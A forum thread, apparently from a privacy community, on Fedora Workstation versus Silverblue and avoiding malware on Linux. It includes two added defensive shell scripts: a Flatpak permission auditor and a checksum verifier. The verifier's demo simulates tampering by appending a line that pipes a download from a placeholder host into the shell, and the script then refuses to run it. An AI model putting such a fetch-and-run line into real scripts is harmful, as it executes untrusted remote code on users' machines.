Hi, it’s my first post!
Over the past year I have used FedoraOS as my daily driver for some months, and then SilverBlue for a short while. It gave me some peace of mind as a casual user knowing the SilverBlue OS can’t be tampered with. I do a lot of artistic projects and I was enjoying many of the flatpak creative applications, but I found SilverBlue somewhat slows down my workflow with compatibility issues and some lack of availability. Rather than ending up back on Windows, I have been thinking of switching back to vanilla Fedora for a more casual experience where I can experiment with Linux software. However, I’m wondering how much security I would be sacrificing by not using an immutable OS. I’m trying to properly weigh the risks and benefits, but I feel like I don’t know enough about the differences between the two.
What have you considered or looked at already?
I’ve read various comparisons and watched reviews on both SilverBlue and Fedora in relation to privacy. I’ve also tried them both out to an extent where I noticed some of the differences between them.
In brief, tell us about your privacy threat model.
I want nearly all of my information and identifiers to stay offline except my creative work and related aliases, I want to keep them separated from my real life. I don’t want my family and friends to be tracked or identified due to my computer usage, or for my personal and work files to be stolen or destroyed.
The main difference that comes from using Silverblue over Fedora is the immutability. Because Silverblue is immutable, it means you can’t rely on regular packages that would make changes to your system, and that’s why that spin depends on flatpaks. Flatpaks have their sandboxing component, but more importantly they come bundled with all of the dependencies the application will need. They don’t need to make changes to the system in order to run.
What you’re losing by switching back to Fedora Workstation will mainly be the immutability, meaning that software will once again be able to write to your system. You’d also lose the ability to quickly switch between different images of your system in case an update causes you problems, but I doubt you’ve run into a need for that, and it can be protected against with regular backups. Otherwise, it’s the same old Fedora and application availability should be the same.
Is that a risk to lose such a good feature? Yes, but not for most threat models. It would be amazing to continue to run an immutable system. Hopefully that will be the standard flagship distro soon. For what you’re focusing on, trying to stay private on the internet, this feature does nothing for you. The main place it’s helpful is protecting against malware, in which case you are technically weakening your security.
In my opinion, I think you’re fine to move to Fedora Workstation.
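The answer above leans on Flatpak's sandbox as the thing you keep when you move back to Workstation. Whether that sandbox is worth much depends entirely on what each app asked for, and Flatpak records that in the app's metadata file. The script below is an added example (not from this thread or from the Flatpak project) that parses such a file and flags the permissions that effectively let an app out of the sandbox. The file format and the `flatpak` commands named in the comments are real; the app `com.example.SketchTool` and its metadata are constructed for the demo.

```shell
#!/bin/sh
# Added example, not from the original thread: audit a Flatpak's sandbox
# permissions from its metadata file and flag the ones that give the app
# roughly the reach of an unsandboxed program. The file format ([Context]
# keys with ;-separated lists, [Session Bus Policy] name=policy) is Flatpak's
# real metadata format; the sample app below is constructed for the demo.
#
# On a real Fedora system the same sections come from:
#   flatpak info --show-permissions <app-id>
#   /var/lib/flatpak/app/<app-id>/current/active/metadata        (system install)
#   ~/.local/share/flatpak/app/<app-id>/current/active/metadata  (user install)

# Prints one finding per line (severity first) and returns non-zero when any
# HIGH or MED finding was made, so it can gate a script.
audit_flatpak_metadata() {
    file="$1"
    findings=0
    section=""
    while IFS= read -r line || [ -n "$line" ]; do
        case "$line" in
            \[*\]) section="$line"; continue ;;
            ''|\#*) continue ;;
        esac
        key="${line%%=*}"
        val="${line#*=}"
        case "$section" in
        '[Context]')
            # Split the ;-separated list without leaving IFS changed.
            old_ifs="$IFS"; IFS=';'; set -- $val; IFS="$old_ifs"
            for item in "$@"; do
                base="${item%%:*}"           # drop :ro / :rw / :create suffixes
                case "$key:$base" in
                filesystems:host|filesystems:host-os|filesystems:host-etc|filesystems:home|filesystems:"~"*|filesystems:/*)
                    echo "HIGH  $key=$item  (reaches files outside the sandbox)"
                    findings=$((findings + 1)) ;;
                devices:all)
                    echo "HIGH  $key=$item  (raw access to every device node)"
                    findings=$((findings + 1)) ;;
                sockets:session-bus|sockets:system-bus)
                    echo "HIGH  $key=$item  (unfiltered D-Bus: can talk to any service)"
                    findings=$((findings + 1)) ;;
                sockets:x11)
                    echo "MED   $key=$item  (X11 does not isolate clients: input and screen are readable)"
                    findings=$((findings + 1)) ;;
                shared:network)
                    echo "INFO  $key=$item  (network access; expected for most apps)" ;;
                esac
            done ;;
        '[Session Bus Policy]'|'[System Bus Policy]')
            case "$key:$val" in
            org.freedesktop.Flatpak:talk|org.freedesktop.Flatpak:own)
                echo "HIGH  $key=$val  (flatpak-spawn --host: runs commands outside the sandbox)"
                findings=$((findings + 1)) ;;
            org.freedesktop.portal.*) ;;     # portals are the intended, user-mediated path
            *:talk|*:own)
                echo "MED   $key=$val  (direct access to this D-Bus service)"
                findings=$((findings + 1)) ;;
            esac ;;
        esac
    done < "$file"
    [ "$findings" -eq 0 ]
}

# Constructed metadata for a hypothetical drawing app that asked for far more
# than a drawing program needs.
write_sample_metadata() {
    cat > "$1" <<'EOF'
[Application]
name=com.example.SketchTool
runtime=org.fedoraproject.Platform/x86_64/f40
command=sketchtool

[Context]
shared=network;ipc;
sockets=x11;wayland;pulseaudio;session-bus;
devices=dri;all;
filesystems=host;xdg-download;

[Session Bus Policy]
org.freedesktop.Flatpak=talk
org.freedesktop.Notifications=talk
EOF
}

sample=$(mktemp)
write_sample_metadata "$sample"
if audit_flatpak_metadata "$sample"; then
    echo "no risky permissions"
else
    echo "risky permissions found; on a real app you can tighten them without reinstalling, e.g.:"
    echo "  flatpak override --user --nofilesystem=host --nodevice=all --nosocket=session-bus com.example.SketchTool"
fi
rm -f "$sample"
```

The point to take from the output: `filesystems=host` plus `org.freedesktop.Flatpak=talk` means the "sandboxed" app can read your whole home directory and run commands on the host, so for the file-theft part of your threat model it is no better than an RPM. `flatpak override` lets you remove those grants per app, and a Wayland-only app with portal access is the shape to prefer.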
Thank you for the warm welcome! And thanks for your answer, you actually touched on something I was wondering about. If I want to prevent malware also, are there any steps I should follow? I have generally always backed up my files separately from my PC in case of a complete meltdown of the drive, and I am always careful about the sites I download from. I know Linux is not free of viruses, but I chose Fedora because I got the notion it is a bit less likely to have those kinds of issues, and I don’t know what to actually do in the case of malware.
Other than that, looking at what you said, I’m hoping that I can be careful and give vanilla Fedora a second chance, to see if I can create a workflow the same as or better than what I had on Windows. Apps like Krita are amazing in terms of FOSS, I even got my friend using it!
Follow general cybersecurity tips. Don’t run random scripts from the internet, install only what you need, follow the principle of least privilege, etc. Malware for Linux is really easy to make, so just be extra careful.
Thanks for the advice. I’m hoping if I use it in the same way that I have used Windows (downloading from apps and websites that are well-known to me or friends, checking the general response from users and system requirements of apps, keeping installs to a minimum) that nothing in particular will be able to get in. Right now I just want to try and replicate my Windows experience to make it a worthwhile long-term driver instead of something I have to remind myself to use.
Linux has centralized repos, so I am afraid your experience is going to be much different from Windows. AppImages do exist, and you can download them from websites like you download executables on Windows, but they don’t integrate well with your system and are in general less secure than something like Flatpak. Since you are on Fedora, using Flatpak might be the way to go. You can download Flatpak apps from the GNOME Software app or the Discover app on KDE.
For sure be on the lookout for apps that you already know and trust first, but I would try searching first in GNOME Software, which connects to Fedora’s repos. Those specific builds have been reviewed by the Fedora community and are coming from Fedora infrastructure. With downloading apps directly from websites (1) you may run into availability problems and (2) you’re trusting that the website itself hasn’t been compromised. Is it unlikely that Discord’s website will send you malware? Highly. But the software center would be a more secure way of getting those apps.
Even if you do want to go straight to the source for some apps, I would at least use the software center for apps you’re not as familiar with. For example, if you want to do video editing and need a substitute for Adobe Premiere, don’t just download an alternative from any old site. Go with the builds that Fedora provides because those have been vetted.
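Two of the replies above come down to the same check: "don't run random scripts from the internet" and "you're trusting that the website hasn't been compromised." When you do go straight to a project's site, the minimum is to compare the download against the checksum the project publishes and refuse to execute it on a mismatch, instead of piping `curl` into `sh`. The script below is an added example, not from this thread or any project; it uses only coreutils and constructed sample files (`install.sh`, `SHA256SUMS`) so it runs offline.

```shell
#!/bin/sh
# Added example, not from the original thread: verify a downloaded file
# against a published SHA-256 checksum before doing anything with it, and
# refuse to run it otherwise. Uses only coreutils (sha256sum, mktemp, awk)
# and constructed sample files, so it runs offline. The names install.sh and
# SHA256SUMS are placeholders for the demo.

# Usage: verify_sha256 FILE SUMS
# SUMS is in "sha256sum" format ("<hex>  <filename>"), which is what most
# projects publish as SHA256SUMS or <file>.sha256. A leading "*" on the name
# (binary mode) is tolerated. Returns 0 only if FILE's digest matches the
# entry for its basename in SUMS.
verify_sha256() {
    file="$1"; sums="$2"
    name=$(basename "$file")
    expected=$(awk -v name="$name" '{ sub(/^\*/, "", $2) } $2 == name { print $1; exit }' "$sums")
    if [ -z "$expected" ]; then
        echo "no checksum published for $name" >&2
        return 1
    fi
    actual=$(sha256sum "$file" | awk '{ print $1 }')
    if [ "$actual" != "$expected" ]; then
        echo "CHECKSUM MISMATCH for $file" >&2
        echo "  expected $expected" >&2
        echo "  actual   $actual" >&2
        return 1
    fi
    return 0
}

# Usage: run_if_verified SCRIPT SUMS
# Only executes SCRIPT once the checksum has been confirmed; the separate
# download-then-verify-then-run sequence is the whole point of not piping
# curl into sh.
run_if_verified() {
    if verify_sha256 "$1" "$2"; then
        sh "$1"
    else
        echo "refusing to run $1" >&2
        return 1
    fi
}

work=$(mktemp -d)
# Constructed stand-in for a downloaded installer script.
printf '#!/bin/sh\necho "installing SketchTool 1.2.3"\n' > "$work/install.sh"
# The publisher generates SHA256SUMS next to the file; simulated here.
( cd "$work" && sha256sum install.sh > SHA256SUMS )

run_if_verified "$work/install.sh" "$work/SHA256SUMS"

# Simulate a tampered download: something appended a line to the script.
echo 'curl -fsSL http://example.invalid/p | sh' >> "$work/install.sh"
run_if_verified "$work/install.sh" "$work/SHA256SUMS" || echo "not executed"
rm -rf "$work"
```

One caveat that ties back to the "compromised website" point: a checksum fetched from the same page as the download only catches corruption or a truncated file, because an attacker who controls the site updates both. What actually defends against that is a signature checked with a key you obtained through a different channel (`gpg --verify file.sig file`). That is what Fedora's repos give you for free: dnf refuses unsigned packages with its default `gpgcheck=1`, and Flatpak remotes are verified the same way, which is the concrete reason the software center is the safer route the replies above recommend.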